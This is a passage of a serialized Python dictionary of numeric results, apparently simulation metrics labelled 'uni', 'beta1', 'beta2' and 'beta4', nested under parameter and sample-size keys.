'beta1': 2.497162317342663, 'beta2': 3.831873093092898, 'beta4': [0.19152027457838408, 5.277460841781809]}, 400: {'uni': 1.8175906273340954, 'beta1': 5.798628259006607, 'beta2': 2.265996141562548, 'beta4': [0.18666272909519135, 4.311034510201182]}, 300: {'uni': 1.752330482850812, 'beta1': 2.446640937487978, 'beta2': 3.156170480487465, 'beta4': [0.19335453547615575, 4.062291176554196]}, 200: {'uni': 2.585300579248603, 'beta1': 3.8614772252430134, 'beta2': 2.427817506054191, 'beta4': [0.199460824777887, 4.721530100708777]}, 150: {'uni': 1.8997609248765257, 'beta1': 2.003172066142217, 'beta2': 2.9051765798592735, 'beta4': [0.18230429899009304, 3.829273701760521]}, 100: {'uni': 2.225330605252653, 'beta1': 3.1330535103231005, 'beta2': 3.866579491183401, 'beta4': [0.1914076126447997, 5.931444497716789]}, 75: {'uni': 1.9375681374299873, 'beta1': 3.2234217980405666, 'beta2': 2.8971241927601485, 'beta4': [0.1910362420977265, 4.146413907380423]}, 50: {'uni': 2.1226998033229885, 'beta1': 2.5656176115610667, 'beta2': 2.663512620988418, 'beta4': [0.16892315886491896, 4.140040221647824]}, 30: {'uni': 2.7067057347613, 'beta1': 2.114623008671077, 'beta2': 3.0476671138328455, 'beta4': [0.1765011431579746, 3.5581193469388115]}, 20: {'uni': 1.6776878433144786, 'beta1': 2.649907170376919, 'beta2': 3.214279820200537, 'beta4': [0.14485132858460728, 3.385563064254459]}, 10: {'uni': 1.7640526663634954, 'beta1': 2.6540089660589876, 'beta2': 4.178786013879768, 'beta4': [0.20634373982749682, 2.921191233260417]}}}, 0.01: {1000: {1000: {'uni': 0.012988144078803505, 'beta1': 0.00038944275185018686, 'beta2': 0.2739412257196214, 'beta4': [0.001901429926485662, 1.0744670600689628]}, 750: {'uni': 0.018954493311881516, 'beta1': 0.0004064874368649216, 'beta2': 0.28164334341957836, 'beta4': [0.0027292845187166957, 1.0598748530262019]}, 500: {'uni': 0.03227328882297064, 'beta1': 0.0012917244174020107, 'beta2': 0.27037257115863184, 'beta4': [0.0038621658913706495, 1.0547470718911076]}, 400: {'uni': 
0.03433464054395813, 'beta1': 0.002369780517218288, 'beta2': 0.28063958889740204, 'beta4': [0.004902554260141074, 1.049709686035498]}, 300: {'uni': 0.03831461561224829, 'beta1': 0.0037592167513096075, 'beta2': 0.29835323043874173, 'beta4': [0.007071102509495777, 1.0426217515350968]}, 200: {'uni': 0.05674481720406174, 'beta1': 0.005284832803397361, 'beta2': 0.3427814820719719, 'beta4': [0.009425129653536651, 1.0391934783953622]}, 150: {'uni': 0.08834898466342368, 'beta1': 0.01244014911343485, 'beta2': 0.3905746763051995, 'beta4': [0.012342493157189289, 1.0348233308668668]}, 100: {'uni': 0.11894024946831482, 'beta1': 0.02444975073959859, 'beta2': 0.44907614468337353, 'beta4': [0.019659596279589155, 1.028889046296725]}, 75: {'uni': 0.1527862700499143, 'beta1': 0.04787451628654083, 'beta2': 0.4787033135597648, 'beta4': [0.029747587227536555, 1.0245077390872745]}, 50: {'uni': 0.2426038704397449, 'beta1': 0.0782378615031597, 'beta2': 0.5218056644958682, 'beta4': [0.041527131802373184, 1.0224094385417244]}, 30: {'uni': 0.3390533680971421, 'beta1': 0.18939106161176048, 'beta2': 0.6846835998957418, 'beta4': [0.056675214880820765, 1.0166970485545934]}, 20: {'uni': 0.45235784655368927, 'beta1': 0.3714038453778036, 'beta2': 0.7011438160594685, 'beta4': [0.08848504553932762, 1.014212197651508]}, 10: {'uni': 0.7798616064607444, 'beta1': 0.6626215824023616, 'beta2': 0.854942257338083, 'beta4': [0.1361740799714233, 1.0112064148732012]}}, 750: {1000: {'uni': 0.014111659450113783, 'beta1': 0.0005193837132983345, 'beta2': 0.3041417560035209, 'beta4': [0.0021059808213720623, 1.089260808726159]}, 750: {'uni': 0.01776621568011013, 'beta1': 0.0005404605453736952, 'beta2': 0.30632535812118766, 'beta4': [0.002608330400828606, 1.075273109299807]}, 500: {'uni': 0.028705411835050567, 'beta1': 0.0009701162458206792, 'beta2': 0.293387533478566, 'beta4': [0.0035869489765737637, 1.0736332892832816]}, 400: {'uni': 0.035925270100480564, 'beta1': 0.002115883346584126, 'beta2': 0.28846361046306584, 
'beta4': [0.0053041492994923365, 1.0685684661263208]}, 300: {'uni': 0.04739663294754829, 'beta1': 0.003944792065230057, 'beta2': 0.3262201641618077, 'beta4': [0.005481018761212053, 1.06674288435139]}, 200: {'uni': 0.07323025971109642, 'beta1': 0.007079292499444228, 'beta2': 0.3504479078456703, 'beta4': [0.008241651578483802, 1.0545837824070112]}, 150: {'uni': 0.07891186837596025, 'beta1': 0.019368677322849078, 'beta2': 0.3677325048079892, 'beta4': [0.01125347103088656, 1.0474333377718406]}, 100: {'uni': 0.11954949574624353, 'beta1': 0.02051741147566948, 'beta2': 0.4607118280456165, 'beta4': [0.018024830416066322, 1.038629659877778]}, 75: {'uni': 0.1667857566555556, 'beta1': 0.03694914894551043, 'beta2': 0.4922451884656646, 'beta4': [0.023016121704478844, 1.0328691452557426]}, 50: {'uni': 0.267023428032651, 'beta1': 0.07890588955448231, 'beta2': 0.5378520535647412, 'beta4': [0.03789863377657755, 1.0276001043725385]}, 30: {'uni': 0.33785390816595817, 'beta1': 0.24746683430732205, 'beta2': 0.6249081272448354, 'beta4': [0.06161697678822258, 1.021437251450835]}, 20: {'uni': 0.48292750740180024, 'beta1': 0.2717511395739313, 'beta2': 0.6945127698879909, 'beta4': [0.08268620779342578, 1.0216636840969495]}, 10: {'uni': 0.7248197547615234, 'beta1': 0.6245977329525259, 'beta2': 0.8875678105634364, 'beta4': [0.1421881432843648, 1.0143655081623668]}}, 500: {1000: {'uni': 0.02188975323112398, 'beta1': 0.0017453824253913159, 'beta2': 0.2956035109830917, 'beta4': [0.003767105090318207, 1.1268252528300466]}, 750: {'uni': 0.02357228780744032, 'beta1': 0.0010166197623719666, 'beta2': 0.29909761062079904, 'beta4': [0.004875872603854908, 1.1245773629752243]}, 500: {'uni': 0.026837036395264052, 'beta1': 0.0013010746719904127, 'beta2': 0.3014218767173777, 'beta4': [0.003665030466863662, 1.1012534822690934]}, 400: {'uni': 0.028163152714100657, 'beta1': 0.001967008933802825, 'beta2': 0.2916764354442436, 'beta4': [0.006081151372860138, 1.0973592614277135]}, 300: {'uni': 0.04039589266243756, 
'beta1': 0.0025297031214923577, 'beta2': 0.3291987120650441, 'beta4': [0.006762903272845259, 1.0927311729646423]}, 200: {'uni': 0.06381560712414723, 'beta1': 0.008711588337987476, 'beta2': 0.349388068575829, 'beta4': [0.009518281554600943, 1.0705205650736693]}, 150: {'uni': 0.08822872644657972, 'beta1': 0.012625655119434065, 'beta2': 0.36359164688986806, 'beta4': [0.0122975587808102, 1.066828776680399]}, 100: {'uni': 0.12034086569249816, 'beta1': 0.028199486576761034, 'beta2': 0.4013937953505733, 'beta4': [0.019410294600082315, 1.0546743195542243]}, 75: {'uni': 0.15710173020411988, 'beta1': 0.05948850797839798, 'beta2': 0.4602254974955219, 'beta4': [0.025921724099794863, 1.0517010799471413]}, 50: {'uni': 0.2532312265823954, 'beta1': 0.07607149041242904, 'beta2': 0.5570252079040533, 'beta4': [0.033107476011882166, 1.0439643502035127]}, 30: {'uni': 0.3533095624701312, 'beta1': 0.17481473091875682, 'beta2': 0.6082250929487117, 'beta4': [0.06369605726718264, 1.0356758375491901]}, 20: {'uni': 0.4570589338099327, 'beta1': 0.3041261325532901, 'beta2': 0.7013060580251537, 'beta4': [0.09388192904197612, 1.02753591382958]}, 10: {'uni': 0.7060683718900814, 'beta1': 0.6155479784933189, 'beta2': 0.8355785086184536, 'beta4': [0.13642816215229916, 1.0217206967991093]}}, 400: {1000: {'uni': 0.028838920421234225, 'beta1': 0.002023990721398416, 'beta2': 0.3595884886124153, 'beta4': [0.004349264377807316, 1.1499553996186684]}, 750: {'uni': 0.031760309280321905, 'beta1': 0.0017463269958980757, 'beta2': 0.347593944893794, 'beta4': [0.004966482944978197, 1.1387788815091806]}, 500: {'uni': 0.029639682537053992, 'beta1': 0.0021690481189058836, 'beta2': 0.36575693930787684, 'beta4': [0.004787347135222721, 1.143960636467822]}, 400: {'uni': 0.03448428077909005, 'beta1': 0.001679178738135301, 'beta2': 0.3332601516725951, 'beta4': [0.005365773889334185, 1.1224023010554964]}, 300: {'uni': 0.03728507705357348, 'beta1': 0.003421016079149095, 'beta2': 0.35258759568773423, 'beta4': 
[0.006769452240699886, 1.0992128217714925]}, 200: {'uni': 0.05937386031855901, 'beta1': 0.008088451915504932, 'beta2': 0.34891296908227415, 'beta4': [0.009966202932037182, 1.0926275641542096]}, 150: {'uni': 0.07494825539591718, 'beta1': 0.009900336507182075, 'beta2': 0.3633810337591094, 'beta4': [0.014015410676247208, 1.0756766254279038]}, 100: {'uni': 0.1452740820402087, 'beta1': 0.04566624562697337, 'beta2': 0.4244085797936966, 'beta4': [0.017619373414129016, 1.0838082958740982]}, 75: {'uni': 0.15759696343829202, 'beta1': 0.03295314139475574, 'beta2': 0.49107280365146033, 'beta4': [0.026961926104242254, 1.0616881249470593]}, 50: {'uni': 0.19965377944271542, 'beta1': 0.09170708993967416, 'beta2': 0.5174241834899962, 'beta4': [0.034885863449721756, 1.0533340818568644]}, 30: {'uni': 0.3911037951130236, 'beta1': 0.2008621720408328, 'beta2': 0.5813834794397994, 'beta4': [0.06621448432105294, 1.0418362843449036]}, 20: {'uni': 0.4532644917880779, 'beta1': 0.31046491235637047, 'beta2': 0.6983812924974165, 'beta4': [0.08584145551321705, 1.0397579843043205]}, 10: {'uni': 0.7049112936255675, 'beta1': 0.5619870648762287, 'beta2': 0.8624110416345726, 'beta4': [0.1420336605742772, 1.0260483032144943]}}, 300: {1000: {'uni': 0.0477506434275743, 'beta1': 0.002656018923794836, 'beta2': 0.38169507431662775, 'beta4': [0.006751240462940516, 1.2044384118076963]}, 750: {'uni': 0.035866440402403874, 'beta1': 0.0025682164531108864, 'beta2': 0.34754934812720045, 'beta4': [0.0060399489557519375, 1.1780336640262834]}, 500: {'uni': 0.0429976433778337, 'beta1': 0.0026997677700779025, 'beta2': 0.3497225195634406, 'beta4': [0.007766880718984553, 1.1714570291435575]}, 400: {'uni': 0.03796627964983832, 'beta1': 0.002680918831818506, 'beta2': 0.31845072684018694, 'beta4': [0.007637211923669038, 1.1767951740193134]}, 300: {'uni': 0.047954341706110834, 'beta1': 0.0040228007949967785, 'beta2': 0.3915189178090604, 'beta4': [0.008341049725251948, 1.1413934344116414]}, 200: {'uni': 0.058801039052903466, 
'beta1': 0.008131127056643357, 'beta2': 0.3604135850986866, 'beta4': [0.009896706931841125, 1.1266276510964888]}, 150: {'uni': 0.07601882623660774, 'beta1': 0.009681047272849304, 'beta2': 0.3807318897695535, 'beta4': [0.013563834359170562, 1.1052335637146984]}, 100: {'uni': 0.10841635391980659, 'beta1': 0.02419096018981847, 'beta2': 0.42051425698862294, 'beta4': [0.02332073317446744, 1.1007862236489643]}, 75: {'uni': 0.15644575063485539, 'beta1': 0.04333966354385248, 'beta2': 0.4510221433433015, 'beta4': [0.025484265648400898, 1.0826793645564343]}, 50: {'uni': 0.22229790326206228, 'beta1': 0.1194104696114188, 'beta2': 0.4972862665901895, 'beta4': [0.033032126852486986, 1.0680192364892767]}, 30: {'uni': 0.3421584222803109, 'beta1': 0.19426053661209747, 'beta2': 0.5991003031397995, 'beta4': [0.05774687896095791, 1.0585791153399502]}, 20: {'uni': 0.41000310363205883, 'beta1': 0.2872927401171547, 'beta2': 0.6791792500576637, 'beta4': [0.08202980551373394, 1.0494588632705306]}, 10: {'uni': 0.71394883730954, 'beta1': 0.6012605316921776, 'beta2': 0.8215291167423904, 'beta4': [0.13552082196825826, 1.032384877072474]}}, 200: {1000: {'uni': 0.05637428762936589, 'beta1': 0.009217193420871453, 'beta2': 0.4051235658647831, 'beta4': [0.009264717821869932, 1.255668494974553]}, 750: {'uni': 0.06205625295675565, 'beta1': 0.006241707563085184, 'beta2': 0.40628981422557625, 'beta4': [0.01166396870680152, 1.2401049601104341]}, 500: {'uni': 0.06620774051688502, 'beta1': 0.011631472592465388, 'beta2': 0.4086508125338102, 'beta4': [0.007982398419828483, 1.2123535892253303]}, 400: {'uni': 0.0557159019556888, 'beta1': 0.0070003045875467775, 'beta2': 0.4479874895263648, 'beta4': [0.01377141708582481, 1.217623150358333]}, 300: {'uni': 0.057193255915006416, 'beta1': 0.007083152253381874, 'beta2': 0.3989165098362032, 'beta4': [0.009459881899006482, 1.2241605731085128]}, 200: {'uni': 0.0655493345741656, 'beta1': 0.007667494082330394, 'beta2': 0.432352490564409, 'beta4': [0.011521818555387774, 
1.179336090260994]}, 150: {'uni': 0.07708595959479046, 'beta1': 0.010004943140099752, 'beta2': 0.41657253266663674, 'beta4': [0.01604343437557773, 1.1583265664784832]}, 100: {'uni': 0.1263165132491358, 'beta1': 0.021544496545364552, 'beta2': 0.4433791705263855, 'beta4': [0.019640660826383667, 1.1432617638709475]}, 75: {'uni': 0.13284213618342994, 'beta1': 0.03353682532833947, 'beta2': 0.4463651381186589, 'beta4': [0.024553127311670607, 1.1144945057044657]}, 50: {'uni': 0.20031721347214956, 'beta1': 0.10486774187747581, 'beta2': 0.5246839387173443, 'beta4': [0.034818327742525974, 1.1157231794606]}, 30: {'uni': 0.31301904620451293, 'beta1': 0.1886326936481399, 'beta2': 0.6187788281549748, 'beta4': [0.061042826858162515, 1.08255899857378]}, 20: {'uni': 0.461074120032512, 'beta1': 0.32435297663532797, 'beta2': 0.6749616321255197, 'beta4': [0.0878038173182829, 1.0723825999562786]}, 10: {'uni': 0.7327323930086018, 'beta1': 0.6021409002552052, 'beta2': 0.8163811901265174, 'beta4': [0.13141861102455427, 1.0566349108690218]}}, 150: {1000: {'uni': 0.067317033122647, 'beta1': 0.014610653548333328, 'beta2': 0.41423990594181115, 'beta4': [0.015195465900901773, 1.2975972495921606]}, 750: {'uni': 0.07134739771277643, 'beta1': 0.01297675226601242, 'beta2': 0.4449985726026145, 'beta4': [0.012702984043174723, 1.332657446897552]}, 500: {'uni': 0.07158654805341536, 'beta1': 0.013205514989078588, 'beta2': 0.47765967888624855, 'beta4': [0.012293972130509437, 1.3157095294645398]}, 400: {'uni': 0.07034182650532116, 'beta1': 0.01407065712769308, 'beta2': 0.4931374751253587, 'beta4': [0.014390288214085094, 1.2612997638466985]}, 300: {'uni': 0.0668930803759735, 'beta1': 0.01552094864787745, 'beta2': 0.4352322164574502, 'beta4': [0.016111201075420335, 1.2999205241316818]}, 200: {'uni': 0.08210671115008272, 'beta1': 0.014309982621535088, 'beta2': 0.4229267072174695, 'beta4': [0.013810958058404505, 1.2279022666381392]}, 150: {'uni': 0.0819048770127292, 'beta1': 0.014083915977824326, 'beta2': 
0.4455770748001402, 'beta4': [0.016448989256336397, 1.2261023328679816]}, 100: {'uni': 0.1124619227831381, 'beta1': 0.02212891084615586, 'beta2': 0.43315186256637916, 'beta4': [0.018516927750900816, 1.1990428526671064]}, 75: {'uni': 0.17413627406404164, 'beta1': 0.04830138338528511, 'beta2': 0.4614161459404568, 'beta4': [0.024628147211136243, 1.1682951226810308]}, 50: {'uni': 0.19441361375983962, 'beta1': 0.09555994518728896, 'beta2': 0.5085726037388353, 'beta4': [0.04000423309857408, 1.133646779809821]}, 30: {'uni': 0.3596328489794518, 'beta1': 0.23345596980686195, 'beta2': 0.602035328072322, 'beta4': [0.05595016121396317, 1.1063362253083466]}, 20: {'uni': 0.49940022824485364, 'beta1': 0.2718272917375905, 'beta2': 0.6917953420150722, 'beta4': [0.0888019052729563, 1.0940863023258154]}, 10: {'uni': 0.7640204794969943, 'beta1': 0.60836577588252, 'beta2': 0.8377569007699075, 'beta4': [0.13896115419536065, 1.0695729688122164]}}, 100: {1000: {'uni': 0.11821762730536435, 'beta1': 0.047083881271799286, 'beta2': 0.4767329414414302, 'beta4': [0.019696898025009797, 1.3759780450899495]}, 750: {'uni': 0.166497002146877, 'beta1': 0.030191650365528174, 'beta2': 0.5745771850100575, 'beta4': [0.01874142585554488, 1.4019321119063006]}, 500: {'uni': 0.1141489883572298, 'beta1': 0.022886589383535046, 'beta2': 0.5059188810811766, 'beta4': [0.023892329918408214, 1.4176836808914035]}, 400: {'uni': 0.10757279402523523, 'beta1': 0.025910744712307768, 'beta2': 0.47516791997531455, 'beta4': [0.024887362134068027, 1.3407564518745063]}, 300: {'uni': 0.11205473228712978, 'beta1': 0.027816294963348084, 'beta2': 0.4595203252789575, 'beta4': [0.02102816906813093, 1.3896095092313074]}, 200: {'uni': 0.1392639018340233, 'beta1': 0.03466261671448098, 'beta2': 0.5064836388671088, 'beta4': [0.019827730733462973, 1.320973379428104]}, 150: {'uni': 0.11172731925062222, 'beta1': 0.03045757437870108, 'beta2': 0.5429801538798318, 'beta4': [0.018311927090665446, 1.2966994614956564]}, 100: {'uni': 
0.1417705961325182, 'beta1': 0.02776033911186053, 'beta2': 0.5135092406613353, 'beta4': [0.021989948671619727, 1.2844512305552225]}, 75: {'uni': 0.16977766093730104, 'beta1': 0.04538718671723866, 'beta2': 0.5048319481429052, 'beta4': [0.025361562349700335, 1.2253436336047208]}, 50: {'uni': 0.21773281447174667, 'beta1': 0.12655947351187494, 'beta2': 0.5958498671576513, 'beta4': [0.04232872037917144, 1.2340478264352763]}, 30: {'uni': 0.3857845219796272, 'beta1': 0.16290330189484536, 'beta2': 0.5970726414958795, 'beta4': [0.06907454580959214, 1.181378758222426]}, 20: {'uni': 0.5361371234035757, 'beta1': 0.3035233614902238, 'beta2': 0.6522890347608998, 'beta4': [0.0820029520321425, 1.152442746950051]}, 10: {'uni': 0.701243951130363, 'beta1': 0.5876166702780768, 'beta2': 0.8498127976808606, 'beta4': [0.13423588905558106, 1.108482890069536]}}, 75: {1000: {'uni': 0.1504497409553797, 'beta1': 0.05778886589789175, 'beta2': 0.5689795075236423, 'beta4': [0.025579604139058413, 1.502171976116502]}, 750: {'uni': 0.1656421417501711, 'beta1': 0.044118094938877105, 'beta2': 0.5308608243630025, 'beta4': [0.025236193283323678, 1.5214092977699725]}, 500: {'uni': 0.1406288013165275, 'beta1': 0.04710819524731978, 'beta2': 0.6294260138397421, 'beta4': [0.03263872467003944, 1.466691104643992]}, 400: {'uni': 0.15260582744474926, 'beta1': 0.049746732140211046, 'beta2': 0.5786004110828491, 'beta4': [0.03002446814907474, 1.4657161105126315]}, 300: {'uni': 0.17139718657612807, 'beta1': 0.043265461012224546, 'beta2': 0.598207639599414, 'beta4': [0.02535836803938531, 1.4335637902113987]}, 200: {'uni': 0.1621007031460252, 'beta1': 0.060715336606847865, 'beta2': 0.627958646227533, 'beta4': [0.02854988898787995, 1.414080068290809]}, 150: {'uni': 0.15657389926793341, 'beta1': 0.04517196769162301, 'beta2': 0.6008731596546857, 'beta4': [0.024001517469219674, 1.4033912381741407]}, 100: {'uni': 0.20078010791468953, 'beta1': 0.0638685270180855, 'beta2': 0.6024611592669924, 'beta4': [0.026687989153733143, 
1.3684372461164178]}, 75: {'uni': 0.19558911614822283, 'beta1': 0.04127156075089937, 'beta2': 0.6219872948600622, 'beta4': [0.02530115353980352, 1.3504751064168508]}, 50: {'uni': 0.24945016241095797, 'beta1': 0.09548932332721162, 'beta2': 0.5704743061455884, 'beta4': [0.03469103695069554, 1.2910941153233388]}, 30: {'uni': 0.3843775697870882, 'beta1': 0.2162354295470449, 'beta2': 0.7225395232778488, 'beta4': [0.06097975411870599, 1.26014709077903]}, 20: {'uni': 0.4608099490730844, 'beta1': 0.377609439074759, 'beta2': 0.6828014075803406, 'beta4': [0.0845414617819174, 1.2220498105221698]}, 10: {'uni': 0.6957575487038375, 'beta1': 0.5817711102357613, 'beta2': 0.8159662327945509, 'beta4': [0.1456865472262332, 1.1761074832049092]}}, 50: {1000: {'uni': 0.2171563016332781, 'beta1': 0.1119882220067852, 'beta2': 0.7295328909426251, 'beta4': [0.036596828296387295, 1.6695178637251924]}, 750: {'uni': 0.31980644420219206, 'beta1': 0.08356402070230286, 'beta2': 0.6568872602016991, 'beta4': [0.03644848778622732, 1.664721881332084]}, 500: {'uni': 0.2787119122221463, 'beta1': 0.08564305576207892, 'beta2': 0.8076205045555513, 'beta4': [0.0372663869694284, 1.5845679652678826]}, 400: {'uni': 0.31512954719118724, 'beta1': 0.09191934849852293, 'beta2': 0.6399963438304054, 'beta4': [0.044356775686283226, 1.6887226611881236]}, 300: {'uni': 0.2978852335601706, 'beta1': 0.11065776415347438, 'beta2': 0.7109359356279316, 'beta4': [0.04377085876988734, 1.6943468662995624]}, 200: {'uni': 0.2698837516337762, 'beta1': 0.08657074634623589, 'beta2': 0.8781098176902961, 'beta4': [0.03965972203722568, 1.6965554757595365]}, 150: {'uni': 0.29282860454290066, 'beta1': 0.12956993080392998, 'beta2': 0.8337280661846921, 'beta4': [0.03678242047033739, 1.5699018695803737]}, 100: {'uni': 0.2996686665157128, 'beta1': 0.09487879758008413, 'beta2': 0.7989016053228302, 'beta4': [0.038780796201137155, 1.4885204427669143]}, 75: {'uni': 0.26825135650124593, 'beta1': 0.1304663803307884, 'beta2': 0.6382631197739325, 
'beta4': [0.038703446172140665, 1.548809371611096]}, 50: {'uni': 0.23328719602827164, 'beta1': 0.1279056112762378, 'beta2': 0.7337035166527172, 'beta4': [0.04461719221729034, 1.4355747808596746]}, 30: {'uni': 0.31766342420836724, 'beta1': 0.2073845454902525, 'beta2': 0.8664281705960387, 'beta4': [0.061479928757434674, 1.4337600600297795]}, 20: {'uni': 0.49857944269872956, 'beta1': 0.37194117505787716, 'beta2': 0.7303859611553145, 'beta4': [0.07943618683979671, 1.3507146157854548]}, 10: {'uni': 0.6740063613368987, 'beta1': 0.5875002880392719, 'beta2': 0.8294800540083995, 'beta4': [0.1423435773909963, 1.2455677102577796]}}, 30: {1000: {'uni': 0.4041367657774476, 'beta1': 0.3891252626085872, 'beta2': 0.8917332171691094, 'beta4': [0.06069384516805439, 2.0878809853058136]}, 750: {'uni': 0.6063487450248459, 'beta1': 0.28515250770408407, 'beta2': 0.907323908221825, 'beta4': [0.06777651085585552, 2.165511890410776]}, 500: {'uni': 0.44887745342739666, 'beta1': 0.20142163124187815, 'beta2': 1.0586969462772107, 'beta4': [0.06112703890643645, 1.9450821248923096]}, 400: {'uni': 0.3671219293884009, 'beta1': 0.29439578709842673, 'beta2': 0.8625000041807787, 'beta4': [0.07096987575608635, 2.292088965648115]}, 300: {'uni': 0.5618374463091304, 'beta1': 0.21529313809975378, 'beta2': 0.9323116397814922, 'beta4': [0.060725063535657646, 1.9415618379545583]}, 200: {'uni': 0.46281000290851027, 'beta1': 0.31836371463471935, 'beta2': 1.074339767464387, 'beta4': [0.06544350048523691, 2.4401579712107853]}, 150: {'uni': 0.45065414372867557, 'beta1': 0.2254781448755926, 'beta2': 0.921098529958321, 'beta4': [0.07493682860369427, 1.9884601872702625]}, 100: {'uni': 0.4818990994754038, 'beta1': 0.22179781725829084, 'beta2': 0.9626354691244079, 'beta4': [0.0673868816555839, 1.8541827841878982]}, 75: {'uni': 0.6113357053235765, 'beta1': 0.2970066066146257, 'beta2': 1.107979555092765, 'beta4': [0.07010660573358148, 1.8919338680785487]}, 50: {'uni': 0.4576323533580108, 'beta1': 0.21108840567426887, 
'beta2': 1.0350342422943783, 'beta4': [0.07781723853206345, 1.7709725863663965]}, 30: {'uni': 0.4729226012285906, 'beta1': 0.2967398499465227, 'beta2': 1.1720397435138796, 'beta4': [0.10061020478239008, 1.5666290649592491]}, 20: {'uni': 0.5047530706836073, 'beta1': 0.3828449749320704, 'beta2': 0.9959358178346716, 'beta4': [0.09150679086653213, 1.5273098854169376]}, 10: {'uni': 0.7253485793653165, 'beta1': 0.7131398068127759, 'beta2': 1.154279478845462, 'beta4': [0.15865868787798984, 1.4651227700649136]}}, 20: {1000: {'uni': 0.8893011051968421, 'beta1': 0.48029489890964144, 'beta2': 1.138570061072868, 'beta4': [0.12016297491888765, 2.7450044819730346]}, 750: {'uni': 0.7842878860829648, 'beta1': 0.5280047378600626, 'beta2': 0.9907178324045341, 'beta4': [0.08074449655529863, 2.4628845216345465]}, 500: {'uni': 0.6495364657918996, 'beta1': 0.5571645541550105, 'beta2': 1.2153026888564329, 'beta4': [0.11212718774146183, 2.4826912142541158]}, 400: {'uni': 0.6790833244406554, 'beta1': 0.688222696542953, 'beta2': 1.0940594366814973, 'beta4': [0.09612572731484217, 2.6378171658296]}, 300: {'uni': 0.7497979123647319, 'beta1': 0.673346361400717, 'beta2': 1.2111769266572192, 'beta4': [0.10650625900424332, 2.662378719953278]}, 200: {'uni': 0.7782799236279321, 'beta1': 0.5066133040115538, 'beta2': 1.5983486399311722, 'beta4': [0.10154176948982443, 2.18300393332201]}, 150: {'uni': 0.769284858919313, 'beta1': 0.7960425816447904, 'beta2': 1.6078106374025654, 'beta4': [0.09700106178564268, 2.47424633203668]}, 100: {'uni': 0.6623091331581044, 'beta1': 0.5188424165311809, 'beta2': 1.3778317192785996, 'beta4': [0.08048551825905041, 2.5782845351068673]}, 75: {'uni': 0.7617937241966218, 'beta1': 0.5291163469257404, 'beta2': 1.6061108763727754, 'beta4': [0.08975903590242737, 2.325750777699574]}, 50: {'uni': 0.7115988582438708, 'beta1': 0.5693966556621504, 'beta2': 1.3152266488463573, 'beta4': [0.08495826703441907, 2.142722449577546]}, 30: {'uni': 0.7034134256344454, 'beta1': 
0.6037393201713395, 'beta2': 1.3551563258206014, 'beta4': [0.0931583019513541, 2.360556989567204]}, 20: {'uni': 0.7100758447852602, 'beta1': 0.6586909629351826, 'beta2': 1.3951430901746895, 'beta4': [0.08885578581538985, 2.13027761302959]}, 10: {'uni': 0.8763687869636916, 'beta1': 0.6621901686619684, 'beta2': 1.4397320052133586, 'beta4': [0.15413113554127414, 1.8900352885932123]}}, 10: {1000: {'uni': 2.0273680826515523, 'beta1': 2.359035556551498, 'beta2': 3.672756126961876, 'beta4': [0.2213782321311552, 4.345382606735576]}, 750: {'uni': 2.3490519213259775, 'beta1': 2.0119800010343014, 'beta2': 2.8645485706294185, 'beta4': [0.23441342363526224, 3.7887379248049053]}, 500: {'uni': 2.389001125272668, 'beta1': 1.8872657257523238, 'beta2': 2.6719189810271513, 'beta4': [0.20011018110379586, 3.6970066494557168]}, 400: {'uni': 2.255684049218137, 'beta1': 2.9094381086720404, 'beta2': 3.0637241743113166, 'beta4': [0.21926471174607634, 5.339869195559868]}, 300: {'uni': 1.7536409747411805, 'beta1': 3.849583292887527, 'beta2': 3.175605250509971, 'beta4': [0.17907412584005683, 4.480746714602472]}, 200: {'uni': 1.773862091385912, 'beta1': 4.078747745882778, 'beta2': 3.461277444009251, 'beta4': [0.19496297219634695, 3.886693122290411]}, 150: {'uni': 2.265039971782233, 'beta1': 3.152798513179202, 'beta2': 3.4393350792778667, 'beta4': [0.15566060788335714, 4.093634455518538]}, 100: {'uni': 2.366653853665828, 'beta1': 4.4934014356822445, 'beta2': 3.800083106177682, 'beta4': [0.16039428725680271, 3.9289581935779605]}, 75: {'uni': 2.2874534331959575, 'beta1': 3.07963290214728, 'beta2': 3.0312126576316696, 'beta4': [0.19916744373968726, 4.206702906032036]}, 50: {'uni': 2.2089566943358725, 'beta1': 4.267458229985183, 'beta2': 3.5008369677013973, 'beta4': [0.17731566928548778, 3.7266964934594444]}, 30: {'uni': 1.882452851274314, 'beta1': 4.000525177515207, 'beta2': 2.51364631796368, 'beta4': [0.16839687927231317, 4.84316434096235]}, 20: {'uni': 2.445988350447573, 'beta1': 
4.060592986449134, 'beta2': 3.2062441274392905, 'beta4': [0.21147740634989898, 3.5687642304126617]}, 10: {'uni': 2.2223725240828744, 'beta1': 4.131116767696193, 'beta2': 4.0318674319204195, 'beta4': [0.1798078313871271, 3.0758409111074045]}}}, 0.1: {1000: {1000: {'uni': 0.012708832597304081, 'beta1': 0.00033166037268448316, 'beta2': 0.21460865011093463, 'beta4': [0.0018516899147039188, 1.059075949409259]}, 750: {'uni': 0.015060860054651262, 'beta1': 0.0006641253071293576, 'beta2': 0.2162166847452195, 'beta4': [0.0025527950881468827, 1.0547627588805712]}, 500: {'uni': 0.023939712971963126, 'beta1': 0.0007901604824047292, 'beta2': 0.24516800594107138, 'beta4': [0.004049694984104264, 1.0444988223242697]}, 400: {'uni': 0.027519572187397166, 'beta1': 0.002460002937910002, 'beta2': 0.261583470206204, 'beta4': [0.004661086832628227, 1.0431727643760105]}, 300: {'uni': 0.03627168676673069, 'beta1': 0.003146307185794746, 'beta2': 0.28682321208602907, 'beta4': [0.005410896474224397, 1.0373268243809708]}, 200: {'uni': 0.06606377693153227, 'beta1': 0.007127748304258846, 'beta2': 0.33526098694387013, 'beta4': [0.007843924312649053, 1.031481235215888]}, 150: {'uni': 0.09086736508905224, 'beta1': 0.011997147118561492, 'beta2': 0.39574485872929643, 'beta4': [0.012200131983621673, 1.0273614609515949]}, 100: {'uni': 0.11749233892140523, 'beta1': 0.0254874114936232, 'beta2': 0.40218091488595314, 'beta4': [0.016694345643181282, 1.0227124741537679]}, 75: {'uni': 0.13891536843765345, 'beta1': 0.0422040997632223, 'beta2': 0.4486272343137246, 'beta4': [0.02832653618019821, 1.0204206100863231]}, 50: {'uni': 0.2262449259542918, 'beta1': 0.08429066248193409, 'beta2': 0.5361554713125934, 'beta4': [0.03447726288853555, 1.0163471180661057]}, 30: {'uni': 0.3046689747877375, 'beta1': 0.143070283433812, 'beta2': 0.5687306521971477, 'beta4': [0.05140180541873996, 1.0146360366065286]}, 20: {'uni': 0.4296501536662478, 'beta1': 0.23259937226933894, 'beta2': 0.6661995228128583, 'beta4': 
